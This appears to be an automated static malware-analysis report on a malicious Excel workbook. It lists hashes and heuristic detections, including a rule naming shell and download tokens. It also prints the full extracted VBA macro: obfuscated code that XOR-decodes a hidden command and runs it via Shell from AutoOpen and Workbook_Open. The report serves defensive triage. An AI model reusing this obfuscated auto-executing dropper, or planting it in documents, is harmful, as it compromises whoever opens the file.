Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8f53db66153b48d1…

MALICIOUS

Office (OOXML)

34.2 KB Created: 2020-06-13 08:08:44 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-04
MD5: e0a21fe4df4bd49bb0408c15d8d25cf5 SHA-1: 81eedb19ec7631341ac46e82a2b4d6a93dd9dd5c SHA-256: 8f53db66153b48d195e91da62399c35b5510365b06dc620e0606c5655bddb3d2
138 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (NbOFLQWnVyGLP)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9544 bytes
SHA-256: 6e81027a7f2d187a9a836793f67ae6963db0e627f324406823e17347338dc8fd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Private DkaQJYEvUYO       As Boolean
Private SJYxSzFTNVZuHH((0 + 0) To 63) As Byte
Private RPjBrNfjQJQ(0 To 127) As Byte
Sub TempO()
Dim NbOFLQWnVyGLP As String
Dim UNjiLbjKSJgxR As String
NbOFLQWnVyGLP = UVlxYakZNJvmu(Array((173 Xor 75), (37 Xor 3), (108 + (40 Xor 97)), (54 Xor 210), ((38 Xor 68) + 11), (152 + (13 Xor 25)), 94, (81 Xor 218), 193, (30 + (26 Xor 57)), (109 Xor 17), (84 + 52), (41 Xor 72), (47 Xor 85), (8 + (3 Xor 4)), ((47 Xor 161) + 42), (6 Xor 46), (162 + 90), (63 + 175), ((6 Xor 30) + (60 Xor 0)), ((19 Xor 37) + 115), (134 Xor 84), ((150 Xor 8) + 72), (62 Xor 114), ((1 Xor 3) + 6), (113 Xor 143), (6 Xor 149), (16 Xor 51), ((126 Xor 233) + (32 Xor 24)), (10 + (123 Xor 189)), ((62 Xor 113) + (35 Xor 30)), _
((0 Xor 1) + (0 Xor 0)), ((36 Xor 12) + (18 Xor 48)), 140, (32 + (28 Xor 121)), (145 + (43 Xor 23)), ((19 Xor 79) + (37 Xor 111)), 171, (29 + 4), ((37 Xor 70) + (43 Xor 16)), (24 Xor 224), (2 Xor 4), (17 + (49 Xor 109)), (30 Xor 222), ((19 Xor 59) + (6 Xor 43)), 150, 6, (4 Xor 105), ((13 Xor 93) + (15 Xor 0)), 182, (145 + 10), (2 Xor 110), ((110 Xor 174) + (0 Xor 3)), (9 + (4 Xor 3)), (154 Xor 102), (3 Xor 5), 246, ((31 Xor 197) + 0), ((9 Xor 7) + (3 Xor 10)), 143, (73 Xor 17), (56 Xor 176), (12 + (144 Xor 76)), 242, ((0 Xor 2) + 48), _
((18 Xor 50) + (156 Xor 94)), 17, 46, ((26 Xor 138) + 46), ((8 Xor 31) + (0 Xor 19)), (52 Xor 135), ((9 Xor 46) + 137), (40 + (63 Xor 85)), (54 + 16), (25 Xor 170), (8 + 66), (49 Xor 129), ((14 Xor 21) + (2 Xor 13)), ((95 Xor 41) + (57 Xor 127)), (10 Xor 150), (52 Xor 97), 224, 155, (29 Xor 139), (27 Xor 5), ((52 Xor 175) + 94), (140 + 80), (138 Xor 93), 120, ((4 Xor 21) + (39 Xor 162)), 12, (33 Xor 118), 237), (0 Xor 0)) & UVlxYakZNJvmu(Array((231 Xor 0), (10 Xor 45), 179, (9 Xor 176), (76 + 90), (138 + 20), (162 + (34 Xor 20)), 38, ((12 Xor 28) + (0 Xor 0)), _
((2 Xor 1) + 19), ((49 Xor 2) + 28), ((15 Xor 45) + 163), ((19 Xor 4) + 73), 141, (113 + (4 Xor 0)), ((2 Xor 1) + 196), (58 + 30), ((13 Xor 29) + 16), (21 + 7), ((146 Xor 9) + 32), ((0 Xor 5) + 8), (231 + 8), (46 Xor 28), (0 + 0), ((12 Xor 92) + 7), ((128 Xor 40) + (6 Xor 45)), 208, ((44 Xor 18) + (58 Xor 65))), 93)
Shell (NbOFLQWnVyGLP)
End Sub
Sub AutoOpen()
TempO
End Sub
Sub Workbook_Open()
TempO
End Sub
Public Function XwsKnjVlxOKzk(ByVal yXLbAgtEScAMy As String) As Byte()
If Not DkaQJYEvUYO Then QgFmXbBVZl
Dim DPlBHOBncF() As Byte: DPlBHOBncF = zgeOdrdtuuRW(yXLbAgtEScAMy)
Dim UaQDmqCYTLi As Long: UaQDmqCYTLi = UBound(DPlBHOBncF) + ((1 Xor 0) + (0 Xor 0))
If UaQDmqCYTLi Mod ((3 Xor 0) + (1 Xor 0)) <> ((0 Xor 0) + 0) Then Err.Raise vbObjectError, , ""
Do While UaQDmqCYTLi > (0 + 0)
If DPlBHOBncF(UaQDmqCYTLi - (1 + (0 Xor 0))) <> Asc("=") Then Exit Do
UaQDmqCYTLi = UaQDmqCYTLi - (1 Xor 0)
Loop
Dim SkeDGVkgGPLs As Long: SkeDGVkgGPLs = (UaQDmqCYTLi * (0 Xor 3)) \ (3 + (1 Xor 0))
Dim ObBfmAjiFXujM() As Byte
ReDim ObBfmAjiFXujM(0 To SkeDGVkgGPLs - 1) As Byte
Dim wVbhMGrxJui As Long
Dim sUjKdAIaMuubs As Long
Do While wVbhMGrxJui < UaQDmqCYTLi
Dim uFPKrBXZArq As Byte: uFPKrBXZArq = DPlBHOBncF(wVbhMGrxJui): wVbhMGrxJui = wVbhMGrxJui + (1 + 0)
Dim HwDDCyxcJTdZt As Byte: HwDDCyxcJTdZt = DPlBHOBncF(wVbhMGrxJui): wVbhMGrxJui = wVbhMGrxJui + (1 + 0)
Dim KtJQalviYKodd As Byte: If wVbhMGrxJui < UaQDmqCYTLi Then KtJQalviYKodd = DPlBHOBncF(wVbhMGrxJui): wVbhMGrxJui = wVbhMGrxJui + ((1 Xor 0) + (0 Xor 0)) Else KtJQalviYKodd = Asc("A")
Dim AlMVBDshDPkOGu As Byte: If wVbhMGrxJui < UaQDmqCYTLi Then AlMVBDshDPkOGu = DPlBHOBncF(wVbhMGrxJui): wVbhMGrxJui = wVbhMGrxJui + 1 Else AlMVBDshDPkOGu = Asc("A")
If uFPKrBXZArq > (77 Xor 50) Or HwDDCyxcJTdZt > (50 Xor 77) Or KtJQalviYKodd > ((3 Xor 50) + 78) Or AlMVBDshDPkOGu > ((48 Xor 112) + (5 Xor 58)) Then _
Err.Raise vbObjectError, , ""
Dim DkYNWWxWtfQ As Byte: DkYNWWxWtfQ = RPjBrNfjQJQ(uFPKrBXZArq)
Dim jFmIueonHJh As Byte: jFmIueonHJh = RPjBrNfjQJQ(HwDDCyxcJTdZt)
Dim BGxvpqERLzfc As Byte: BGxvpqERLzfc = RPjBrNfjQJQ(KtJQalviYKodd)
Dim fjSSTzEepFV As Byte: fjSSTzEepFV = RPjBrNfjQJQ(AlMVBDshDPkOGu)
If DkYNWWxWtfQ > ((16 Xor 46) + (0 Xor 1)) Or jFmIueonHJh > (55 Xor 8) Or BGxvpqERLzfc > 63 Or fjSSTzEepFV > 63 Then _
Err.Raise vbObjectError, , ""
Dim eYcItzGTSeLoco As Byte: eYcItzGTSeLoco = (DkYNWWxWtfQ * (0 + 4)) Or (jFmIueonHJh \ &H10)
Dim szPSwOOIENDb As Byte: szPSwOOIENDb = ((jFmIueonHJh And &HF) * &H10) Or (BGxvpqERLzfc \ (3 Xor 7))
Dim qiNcauzEpA As Byte: qiNcauzEpA = ((BGxvpqERLzfc And (2 + (1 Xor 0))) * &H40) Or fjSSTzEepFV
ObBfmAjiFXujM(sUjKdAIaMuubs) = eYcItzGTSeLoco: sUjKdAIaMuubs = sUjKdAIaMuubs + (0 + (1 Xor 0))
If sUjKdAIaMuubs < SkeDGVkgGPLs Then ObBfmAjiFXujM(sUjKdAIaMuubs) = szPSwOOIENDb: sUjKdAIaMuubs = sUjKdAIaMuubs + 1
If sUjKdAIaMuubs < SkeDGVkgGPLs Then ObBfmAjiFXujM(sUjKdAIaMuubs) = qiNcauzEpA: sUjKdAIaMuubs = sUjKdAIaMuubs + (0 + 1)
Loop
XwsKnjVlxOKzk = ObBfmAjiFXujM
End Function
Private Sub QgFmXbBVZl()
Dim WAhFtXROTYyu As Integer, dZyznuTXBQB As Integer
dZyznuTXBQB = ((0 Xor 0) + 0)
For WAhFtXROTYyu = Asc("A") To Asc("Z"): SJYxSzFTNVZuHH(dZyznuTXBQB) = WAhFtXROTYyu: dZyznuTXBQB = dZyznuTXBQB + 1: Next
For WAhFtXROTYyu = Asc("a") To Asc("z"): SJYxSzFTNVZuHH(dZyznuTXBQB) = WAhFtXROTYyu: dZyznuTXBQB = dZyznuTXBQB + 1: Next
For WAhFtXROTYyu = Asc("0") To Asc("9"): SJYxSzFTNVZuHH(dZyznuTXBQB) = WAhFtXROTYyu: dZyznuTXBQB = dZyznuTXBQB + ((0 Xor 0) + (0 Xor 1)): Next
SJYxSzFTNVZuHH(dZyznuTXBQB) = Asc("+"): dZyznuTXBQB = dZyznuTXBQB + (1 Xor 0)
SJYxSzFTNVZuHH(dZyznuTXBQB) = Asc("/"): dZyznuTXBQB = dZyznuTXBQB + (1 Xor 0)
For dZyznuTXBQB = (0 + 0) To ((18 Xor 55) + (25 Xor 67)): RPjBrNfjQJQ(dZyznuTXBQB) = (102 Xor 153): Next
For dZyznuTXBQB = ((0 Xor 0) + 0) To (60 + 3): RPjBrNfjQJQ(SJYxSzFTNVZuHH(dZyznuTXBQB)) = dZyznuTXBQB: Next
DkaQJYEvUYO = True
End Sub
Private Function zgeOdrdtuuRW(ByVal yXLbAgtEScAMy As String) As Byte()
Dim jFmIueonHJh() As Byte: jFmIueonHJh = yXLbAgtEScAMy
Dim rIKlnrSBHoCc As Long: rIKlnrSBHoCc = (UBound(jFmIueonHJh) + ((0 Xor 1) + 0)) \ (1 Xor 3)
If rIKlnrSBHoCc = (0 Xor 0) Then zgeOdrdtuuRW = jFmIueonHJh: Exit Function
Dim BGxvpqERLzfc() As Byte
ReDim BGxvpqERLzfc(0 To rIKlnrSBHoCc - ((0 Xor 0) + 1)) As Byte
Dim CuXoYJhVOiyAdc As Long
For CuXoYJhVOiyAdc = 0 To rIKlnrSBHoCc - ((0 Xor 0) + (0 Xor 1))
Dim WAhFtXROTYyu As Long: WAhFtXROTYyu = jFmIueonHJh(2 * CuXoYJhVOiyAdc) + (7 Xor 263) * CLng(jFmIueonHJh((2 + 0) * CuXoYJhVOiyAdc + 1))
If WAhFtXROTYyu >= (121 Xor 377) Then WAhFtXROTYyu = Asc("?")
BGxvpqERLzfc(CuXoYJhVOiyAdc) = WAhFtXROTYyu
Next
zgeOdrdtuuRW = BGxvpqERLzfc
End Function
Private Function UVlxYakZNJvmu(PKwCTohBdjO As Variant, JUknoaTyrV As Integer)
Dim kDmnOyNBuSuCo As String
Dim oXQDRzHXtmEcgc() As Byte
oXQDRzHXtmEcgc = XwsKnjVlxOKzk("lknCgR/fNu6tLVLtGR8vmgqLiTHd8o44fI6pDODhtTNkvbP1iJ8SsMsyQoI08igIJ9O7QaxliGCftnKveqqtyG6LZFriE4qdoBr9L8Rd0+4+v+jzfYyuvgzvUDuMhQqB5dL7q1JMVC6hTugNonoCJ5VRrVNkebao3A==")
kDmnOyNBuSuCo = ""
For dZyznuTXBQB = LBound(PKwCTohBdjO) To UBound(PKwCTohBdjO)
kDmnOyNBuSuCo = kDmnOyNBuSuCo & Chr(oXQDRzHXtmEcgc(dZyznuTXBQB + JUknoaTyrV) Xor PKwCTohBdjO(dZyznuTXBQB))
Next
UVlxYakZNJvmu = kDmnOyNBuSuCo
End Function


Attribute VB_Name = "Module2"





Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit

Private Sub Worksheet_SelectionChange(ByVal Target As Range)
    If Selection.Count = 1 Then
        If Not Intersect(Target, Range("D420")) Is Nothing Then
            Call ghd
        End If
    End If
End Sub






Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False





Attribute VB_Name = "ThisWorkbook1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Attribute VB_Name = "ThisWorkbook2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
 
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
    If Selection.Count = 1 Then
        If Not Intersect(Target, Range("M1337")) Is Nothing Then
            Call TempO
        End If
    End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 62976 bytes
SHA-256: 51ab5cce9288546aedb8e14deb8d61781988e59553473a35f25a01ad2784e911
Detection
ClamAV: No threats found
Obfuscation or payload: likely
362 of 569 identifiers look randomly generated (e.g. 'fNu6tLVLtGR8vmgqLiTHd8o44fI6pDODhtTNkvbP'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).